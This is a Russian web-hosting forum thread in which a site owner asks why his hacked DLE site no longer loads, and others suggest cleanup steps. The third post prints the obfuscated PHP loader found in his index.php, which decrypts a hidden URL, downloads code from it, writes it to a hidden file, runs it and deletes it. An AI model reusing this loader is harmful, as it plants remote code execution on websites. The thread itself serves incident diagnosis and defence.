Скрыть объявление
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Вопрос? Сайт не открывается после взлома

Тема в разделе "Вопросы- ответы", создана пользователем MIKE_FM, 13 дек 2017.

13.12.17 в 23:07
07.04.18 в 08:32
14
1.370
0
  1. TopicStarter Overlay
    MIKE_FM

    MIKE_FM Местный

    Регистрация:
    27 дек 2015
    Сообщения:
    1.884
    Лучших ответов:
    2
    Рейтинги:
    +370 / 43 / -0
    Недавно у меня на хостинге ломанули сразу 3 моих сайта.

    Один из них "почистил" (удалил новопоявившиеся папки), но сайт не открывается. Т.к. открывается какая-то ересь. при этом админка нормально работает:

    ересь.JPG

    Подскажите, где смотреть и что это за херня вообще такая???
     
  2. Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.992
    Лучших ответов:
    6
    Рейтинги:
    +2.000 / 141 / -0
    проверь файл index.php может там что то добавили.
    если бы у меня такое произашло я бы на локалке иkb на любом другом хостенге поставил сайт а когда все настроил,старый удали,для этого не обязательно днс прописывать, в файле hosts пропиши 55.682.29.66 www.kino.ru kino.ru за два дня можно все три сайта сделать.
    о какой безопасности речь идет, когда ты у себя даже поля не закрыл

    upload_2017-12-13_23-23-32.png
    а потом ставь два интивируса по крону,один родной на минуту а второй ZEOS ANTIVIRUS - на полторы минуты - любой не нужный системный файл, например rss.php он по сути не нужен а в него вставь антивирус.
     
  3. TopicStarter Overlay
    MIKE_FM

    MIKE_FM Местный

    Регистрация:
    27 дек 2015
    Сообщения:
    1.884
    Лучших ответов:
    2
    Рейтинги:
    +370 / 43 / -0
    Из того, что ты написал я только понял, что надо проверить файл index.php. Остальное вообще не понял...

    Проверил.. вот такая хрень там была:
    (сайт всё еще не открывается нормально)
    Код:
    <?php
    @ini_set('display_errors', '0');
    error_reporting(0);
    if (!$npDcheckClassBgp) {
    $ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'md5'; $pass = "Zgc5c4MXrKo0bwgSt59GLLCCJxfXN70cmCWIX7HVoQ==";
    if (ini_get('allow_url_fopen')) {
        function get_data_ya($url) {
            $data = file_get_contents($url);
            return $data;
        }
    }
    else {
        function get_data_ya($url) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
    }
    function wp_cd($fd, $fa="")
    {
       $fe = "wp_frmfunct";
       $len = strlen($fd);
       $ff = '';
       $n = $len>100 ? 8 : 2;
       while( strlen($ff)<$len )
       {
          $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
       }
       return $fd^$ff;
    }
    $reqw = $ay($ao($oa("$pass"), 'wp_function'));
    preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
    $dirs = glob("*", GLOB_ONLYDIR);
    foreach ($dirs as $dira) {
        if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
        $subdirs = glob("$dira/*", GLOB_ONLYDIR);
        foreach ($subdirs as $subdira) {
            if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
        }
    }
    if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
    fwrite($hdl, "<?php\n$mtchs[1]\n?>");
    fclose($hdl);
    include("{$eb}.$algo");
    unlink("{$eb}.$algo");
    $npDcheckClassBgp = 'aue';
    }
    ?>
     
  4. Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.992
    Лучших ответов:
    6
    Рейтинги:
    +2.000 / 141 / -0
    MIKE_FM теперь долго искать,быстрее выйдет тестовый хостинг снять и сайты все сделать по новой,если сейчас начнешь к утру все сделаешь,а те удалишь

    идешь сейчас берешь тестовый хостинг,прописываешь там свои домены и у себя в файле C:\Windows\System32\drivers\etc/hosts
    прописываешь ip адрес того хостинга и свои домены так 90.022.05.00 www.kino.be kino.be и делаешь сайты

    у тебя сервер по ходу взломан а не сайты,может пароль где то проебал,по ссылки перешол куки украли,может вирус на компе а может спиздить доступы ftp
     
    #4 Romantv, 13 дек 2017
    Последнее редактирование модератором: 14 дек 2017
  5. TopicStarter Overlay
    MIKE_FM

    MIKE_FM Местный

    Регистрация:
    27 дек 2015
    Сообщения:
    1.884
    Лучших ответов:
    2
    Рейтинги:
    +370 / 43 / -0
    Но ебанули тока 2 сайта почему-то.
    Щас тогда буду менять все пароли.

    Сорян, но я всё равно не понял твоей идеи.

    Скажи, а что ты имел ввиду, когда писал, что у меня поля не закрыты?
     
    #5 MIKE_FM, 13 дек 2017
    Последнее редактирование модератором: 14 дек 2017
  6. Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.992
    Лучших ответов:
    6
    Рейтинги:
    +2.000 / 141 / -0
    делай новы
    MIKE_FM не только на сервере а именно все пароли,почту тоже.
    два года пользуюсь программой www.stickypassword.com/ru/ все важные пароли примерно такие wJS1myKM!nH@a2(j9A|i

    не закрыты просмотри сам /engine/data/xfields.txt
    а должны быть закрыты пример demo.dle-news.ru/engine/data/xfields.txt
     
    #6 Romantv, 13 дек 2017
    Последнее редактирование модератором: 14 дек 2017
  7. TopicStarter Overlay
    MIKE_FM

    MIKE_FM Местный

    Регистрация:
    27 дек 2015
    Сообщения:
    1.884
    Лучших ответов:
    2
    Рейтинги:
    +370 / 43 / -0
    Я чет не думал, что это опасно...
    А как закрыть?
     
  8. Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.992
    Лучших ответов:
    6
    Рейтинги:
    +2.000 / 141 / -0
    я незнаю как

    у меня так
    location ~* (engine/cache/data) {
    deny all;
    }
    права на папки и все файлы .htaccess должны быть на месте
     
    #8 Romantv, 13 дек 2017
    Последнее редактирование модератором: 14 дек 2017
  9. TopicStarter Overlay
    MIKE_FM

    MIKE_FM Местный

    Регистрация:
    27 дек 2015
    Сообщения:
    1.884
    Лучших ответов:
    2
    Рейтинги:
    +370 / 43 / -0
    Пусть тогда смотрят. Мне не жаль)

    А где это прописано?
     
    #9 MIKE_FM, 14 дек 2017
    Последнее редактирование модератором: 14 дек 2017
  10. Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.992
    Лучших ответов:
    6
    Рейтинги:
    +2.000 / 141 / -0
    не в этом дело может файл выполнятся .html .htm такие расширения могут быть шелом и работать как ftp

    у меня в конфиге
     
    #10 Romantv, 14 дек 2017
    Последнее редактирование модератором: 14 дек 2017
  11. byroot

    Забанен

    Регистрация:
    10 окт 2015
    Сообщения:
    12.297
    Лучших ответов:
    54
    Рейтинги:
    +5.205 / 74 / -0
    заменяй его на родной от ДЛЕ, тут видно что код какой-то странный. Так же проверяй все остальные файлы, возможно и туда что-то запихали раз уж они получили доступ к правке файлов и изменили корневой index.php
     
  12. Gogolmogol

    Gogolmogol Зелёный

    Регистрация:
    26 июл 2017
    Сообщения:
    12
    Лучших ответов:
    0
    Рейтинги:
    +4 / 0 / -0
    Подскажите пожалуйста, как скрыть xfields.txt?
     
  13. Romantv

    Забанен

    Регистрация:
    17 июл 2015
    Сообщения:
    6.992
    Лучших ответов:
    6
    Рейтинги:
    +2.000 / 141 / -0
    Все очень просто,надо почитать документацию dle и следовать ей.
     
    #13 Romantv, 7 апр 2018
    Последнее редактирование: 7 апр 2018
  14. Red_Fox

    Red_Fox Бывалый

    Регистрация:
    10 авг 2017
    Сообщения:
    469
    Лучших ответов:
    0
    Рейтинги:
    +78 / 12 / -0
    в .htaccess можно запретить
     
  15. Gogolmogol

    Gogolmogol Зелёный

    Регистрация:
    26 июл 2017
    Сообщения:
    12
    Лучших ответов:
    0
    Рейтинги:
    +4 / 0 / -0
    Пробовал через .htaccess, но не выходило, поэтому и спросил. Теперь уже понял, что дело в AllowOverride. Спасибо.
     
    #15 Gogolmogol, 7 апр 2018
    Последнее редактирование: 6 янв 2019
Похожие темы
  1. ERR
    Ответов:
    68
    Просмотров:
    4.478
  2. RastaMan
    Ответов:
    8
    Просмотров:
    1.016
  3. GROMOVOY
    Ответов:
    24
    Просмотров:
    2.080
  4. Dezorientare
    Ответов:
    0
    Просмотров:
    1.265
Загрузка...
Яндекс.Метрика